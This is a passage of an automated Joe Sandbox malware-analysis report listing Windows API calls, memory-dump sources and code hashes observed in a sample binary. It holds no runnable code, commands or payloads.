                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                            • String ID:
                                            • API String ID: 1211466189-0
                                            • Opcode ID: 39e21dc4127d221ff608f9c5a9bc5afb74ed43ef0aaae4bbb56aa97f47e71bc1
                                            • Instruction ID: c819869c3ce7ae7a3332dfa031e4f6a160937081335f6c7fab467a9a77269cb1
                                            • Opcode Fuzzy Hash: 39e21dc4127d221ff608f9c5a9bc5afb74ed43ef0aaae4bbb56aa97f47e71bc1
                                            • Instruction Fuzzy Hash: 49B1B935604225EFDF18CF69C9C57AD7BB1FF44704F08906AEC48AB295D770A960CBA0
                                            APIs
                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E4C417,00000004,00000000,00000000,00000000), ref: 00E12ACF
                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E4C417,00000004,00000000,00000000,00000000,000000FF), ref: 00E12B17
                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E4C417,00000004,00000000,00000000,00000000), ref: 00E4C46A
                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E4C417,00000004,00000000,00000000,00000000), ref: 00E4C4D6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: ede84f9061fc6f8bccc90c530cae7d1fb0b06f1d28e38686505acce43047f1bc
                                            • Instruction ID: a6eb42ae8a18d5d9d5cf1115409705e3bbea00d0820497b60c94fbaa16878080
                                            • Opcode Fuzzy Hash: ede84f9061fc6f8bccc90c530cae7d1fb0b06f1d28e38686505acce43047f1bc
                                            • Instruction Fuzzy Hash: 1B413C312087809FC7398B299D98BFB3BA1AF45304F24A41FE257B7561D635A8E5D710
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E7737F
                                              • Part of subcall function 00E30FF6: std::exception::exception.LIBCMT ref: 00E3102C
                                              • Part of subcall function 00E30FF6: __CxxThrowException@8.LIBCMT ref: 00E31041
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E773B6
                                            • EnterCriticalSection.KERNEL32(?), ref: 00E773D2
                                            • _memmove.LIBCMT ref: 00E77420
                                            • _memmove.LIBCMT ref: 00E7743D
                                            • LeaveCriticalSection.KERNEL32(?), ref: 00E7744C
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E77461
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E77480
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                            • String ID:
                                            • API String ID: 256516436-0
                                            • Opcode ID: d33f7d6daea0de4b644ef3ff45c1bbf20a936bf2092030a9016a41caa5578ff0
                                            • Instruction ID: 6c1a3efa941f6c410ff372bdaa6d34421762ddcfb74c04580b58f2da07764441
                                            • Instruction Fuzzy Hash: 65315D31A04205EFDB10DF65DD89AAE7BB8EF44710F1481BAF904FB256DB709A14DBA0
                                            APIs
                                            • DeleteObject.GDI32(00000000), ref: 00E9645A
                                            • GetDC.USER32(00000000), ref: 00E96462
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E9646D
                                            • ReleaseDC.USER32(00000000,00000000), ref: 00E96479
                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E964B5
                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E964C6
                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E99299,?,?,000000FF,00000000,?,000000FF,?), ref: 00E96500
                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E96520
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                            • String ID:
                                            • API String ID: 3864802216-0
                                            • Opcode ID: 8ed87dd76d345d5dc8488d4b35915a95235ee71085b77bce415475829ca803fc
                                            • Instruction ID: 772d081dd25ce0bea7fa58a107adb4e9869affd0a012629d54870717e784ad3c
                                            • Instruction Fuzzy Hash: 27318D72201210BFEF108F51CC8AFEA3FA9EF09765F040066FE08EA196C6759C51CBA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memcmp
                                            • String ID:
                                            • API String ID: 2931989736-0
                                            • Opcode ID: 6eff56a46b8e40846cea9a4d7eb84ad7b06d4b94be4a34d0a65f82a1bb4b8b6f
                                            • Instruction ID: 146057bbfdc67dfb45d7c488935c4233911d3f47e4a169105b8694d1bea93f2c
                                            • Instruction Fuzzy Hash: C221D771681305B7D250A525AC47FBB37ACAF163E8F243028FE46BA283E751ED11C1E5
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                              • Part of subcall function 00E2FEC6: _wcscpy.LIBCMT ref: 00E2FEE9
                                            • _wcstok.LIBCMT ref: 00E7EEFF
                                            • _wcscpy.LIBCMT ref: 00E7EF8E
                                            • _memset.LIBCMT ref: 00E7EFC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                            • String ID: X
                                            • API String ID: 774024439-3081909835
                                            • Opcode ID: 9ac66b26f67fd2ca6495d95bc1fa54d5fd9f27f052ec1044180c11c7fd238a8e
                                            • Instruction ID: d8bad204ac1b8986808199bbc1f8e65a9851cdcee6b05769024392305fb1e539
                                            • Instruction Fuzzy Hash: BBC151716083019FC724EF24C895A9EB7E4FF85314F04996DF899A72A2DB30ED45CB92
                                            APIs
                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E86F14
                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E86F35
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86F48
                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00E86FFE
                                            • inet_ntoa.WSOCK32(?), ref: 00E86FBB
                                              • Part of subcall function 00E6AE14: _strlen.LIBCMT ref: 00E6AE1E
                                              • Part of subcall function 00E6AE14: _memmove.LIBCMT ref: 00E6AE40
                                            • _strlen.LIBCMT ref: 00E87058
                                            • _memmove.LIBCMT ref: 00E870C1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                            • String ID:
                                            • API String ID: 3619996494-0
                                            • Opcode ID: 414f5f3f68fc3833e83a7df8ae394fa1fd905c87b2ab8416981ebd5d6aacba83
                                            • Instruction ID: de7ce70e0e4ee732bd639dbf8f6af642a098330fb109b85265c0027429afd7af
                                            • Instruction Fuzzy Hash: AA81D171508300ABC710EF24CC95EABB7E9AF84718F14691DF59EBB2A2DA70DD44C792
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82d4c6313403a227ddd920620a49d294135c7d4b92114f51cf0016d240d9af95
                                            • Instruction ID: f0e2d0dd8fce141b64da2e56c00999ad1894ef450e811a0de9ef71ba99f2f430
                                            • Instruction Fuzzy Hash: B5716F30900119EFCB04CF99CC45AFEBBB9FF85314F148199FA25BA251C734AA91CBA4
                                            APIs
                                            • IsWindow.USER32(01044E28), ref: 00E9B6A5
                                            • IsWindowEnabled.USER32(01044E28), ref: 00E9B6B1
                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E9B795
                                            • SendMessageW.USER32(01044E28,000000B0,?,?), ref: 00E9B7CC
                                            • IsDlgButtonChecked.USER32(?,?), ref: 00E9B809
                                            • GetWindowLongW.USER32(01044E28,000000EC), ref: 00E9B82B
                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E9B843
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                            • String ID:
                                            • API String ID: 4072528602-0
                                            • Opcode ID: 253907af5c63bd546f508e74d50e8a0644cd5e7134893c490310068c579c092f
                                            • Instruction ID: 8c72fe5c6d7834d7b9be6c1dc3e2a21e545060995903872b2365dbfb480e79d0
                                            • Instruction Fuzzy Hash: 8E719D34600204AFDF249FA5EAD4FEA7BB9EF89304F14126BE945B7362C731A951CB50
                                            APIs
                                            • _memset.LIBCMT ref: 00E8F75C
                                            • _memset.LIBCMT ref: 00E8F825
                                            • ShellExecuteExW.SHELL32(?), ref: 00E8F86A
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                              • Part of subcall function 00E2FEC6: _wcscpy.LIBCMT ref: 00E2FEE9
                                            • GetProcessId.KERNEL32(00000000), ref: 00E8F8E1
                                            • CloseHandle.KERNEL32(00000000), ref: 00E8F910
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                            • String ID: @
                                            • API String ID: 3522835683-2766056989
                                            • Opcode ID: d9f3e558f1d05974fefa5359a88f60819bede8a84c65464812aa9b141cbee5a5
                                            • Instruction ID: 216a7d306b2b062f08b7102f0268f0df7ae6006394b97a99f1a3ba30bd792802
                                            • Instruction Fuzzy Hash: C4619C75A006199FCB14EF64C5919AEBBF5FF48310F14946AE84ABB351CB30AD80CF90
                                            APIs
                                            • GetParent.USER32(?), ref: 00E7149C
                                            • GetKeyboardState.USER32(?), ref: 00E714B1
                                            • SetKeyboardState.USER32(?), ref: 00E71512
                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E71540
                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E7155F
                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E715A5
                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E715C8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: e16a8f8f744c3c349e8fe149a825a110fd76e2ec0012a6b46c282e6ad6a43998
                                            • Instruction ID: 53b918f72fad41c6aa932050df0dca104759d1d7fdc4239031b956c9b854c099
                                            • Instruction Fuzzy Hash: B851D2A06047D53EFB3A46788C45BBA7EA95B46308F08D4C9E5D9698C2D398DC84D750
                                            APIs
                                            • GetParent.USER32(00000000), ref: 00E712B5
                                            • GetKeyboardState.USER32(?), ref: 00E712CA
                                            • SetKeyboardState.USER32(?), ref: 00E7132B
                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E71357
                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E71374
                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E713B8
                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E713D9
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: 6464d0dd1c169827cfc8de99a43be554cf352e4c1d25428c7c2397481fb3d111
                                            • Instruction ID: e3c334dec90e1b6026ce3f00bfc7cd4042a955f171476167c1069dd203e5f414
                                            • Instruction Fuzzy Hash: E851F4A05047D53DFB3683288C45BBABFA95B06308F08D5C9E1DCAA8C3D394EC98E751
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcsncpy$LocalTime
                                            • String ID:
                                            • API String ID: 2945705084-0
                                            • Opcode ID: 64d74632da25c396a6ab9aa7cd52c3d63733268b0d698a2e775e7eb2b1b190cf
                                            • Instruction ID: e6fa9b66fcf5d051ec9feab64cbd5bac6b1a50da8586cda97064a8cf1118a401
                                            • Instruction Fuzzy Hash: 6941A4A6C20528B6CB11EBB5888A9CF77F89F04310F50E966F618F3121E634E754C7E5
                                            APIs
                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E6DAC5
                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E6DAFB
                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E6DB0C
                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E6DB8E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                            • String ID: ,,$DllGetClassObject
                                            • API String ID: 753597075-2867008933
                                            • Opcode ID: e66ed2fa4175eac1c9d2779bfb1bc0122bf5816bb11ce80e9faf4f645a952268
                                            • Instruction ID: e3223c2190eb335d6e20662d76c69ecf6e427f67e2060d341fc9bfa12d6e1d7d
                                            • Instruction Fuzzy Hash: 1F41C671A44204DFDB14CF15DC84A9A7BA9EF84390F5550AEED05EF209D7B1DD44CB90
                                            APIs
                                              • Part of subcall function 00E748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E738D3,?), ref: 00E748C7
                                              • Part of subcall function 00E748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E738D3,?), ref: 00E748E0
                                            • lstrcmpiW.KERNEL32(?,?), ref: 00E738F3
                                            • _wcscmp.LIBCMT ref: 00E7390F
                                            • MoveFileW.KERNEL32(?,?), ref: 00E73927
                                            • _wcscat.LIBCMT ref: 00E7396F
                                            • SHFileOperationW.SHELL32(?), ref: 00E739DB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                            • String ID: \*.*
                                            • API String ID: 1377345388-1173974218
                                            • Opcode ID: b3dc1939e77c1983cc93160a51149f67e63e9835a1b7df1365d0efd716a2636a
                                            • Instruction ID: ec61cc22dad8746436bdfb41ccbdf084f295a8013e1d1943b75feb8be28059e9
                                            • Opcode Fuzzy Hash: b3dc1939e77c1983cc93160a51149f67e63e9835a1b7df1365d0efd716a2636a
                                            • Instruction Fuzzy Hash: 6A4182B25083449EC752EF74C445ADFB7E8AF88340F04692EF589E3151EB74D688C752
                                            APIs
                                            • _memset.LIBCMT ref: 00E97519
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E975C0
                                            • IsMenu.USER32(?), ref: 00E975D8
                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E97620
                                            • DrawMenuBar.USER32 ref: 00E97633
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                            • String ID: 0
                                            • API String ID: 3866635326-4108050209
                                            • Opcode ID: e7fc31d0f1e6ff1f09684e5f19bc2ecc468d54c96099748afdfe07b502954a55
                                            • Instruction ID: d51e54b7d70822a0454269a0b619ecb211d9cea59232f09f2ee07b08f031cbd3
                                            • Opcode Fuzzy Hash: e7fc31d0f1e6ff1f09684e5f19bc2ecc468d54c96099748afdfe07b502954a55
                                            • Instruction Fuzzy Hash: 1B415674A14608EFDF20DF55D884E9ABBF8FB08314F04902AED95A7291D730AD58CFA0
                                            APIs
                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E9125C
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E91286
                                            • FreeLibrary.KERNEL32(00000000), ref: 00E9133D
                                              • Part of subcall function 00E9122D: RegCloseKey.ADVAPI32(?), ref: 00E912A3
                                              • Part of subcall function 00E9122D: FreeLibrary.KERNEL32(?), ref: 00E912F5
                                              • Part of subcall function 00E9122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E91318
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E912E0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                            • String ID:
                                            • API String ID: 395352322-0
                                            • Opcode ID: 5cb02f5ef61982ded2e55cf4d0a756186e06744af2922ba6a9b36ba84696367a
                                            • Instruction ID: a30dd88961be3e00c32b263dee6667e007e2e6312dd0030a8e18c499fa069040
                                            • Opcode Fuzzy Hash: 5cb02f5ef61982ded2e55cf4d0a756186e06744af2922ba6a9b36ba84696367a
                                            • Instruction Fuzzy Hash: 44310F71A0111ABFDF15DB91DC85AFEB7BCEF08304F0011AAE515F2151D6745E499AA0
                                            APIs
                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E9655B
                                            • GetWindowLongW.USER32(01044E28,000000F0), ref: 00E9658E
                                            • GetWindowLongW.USER32(01044E28,000000F0), ref: 00E965C3
                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E965F5
                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E9661F
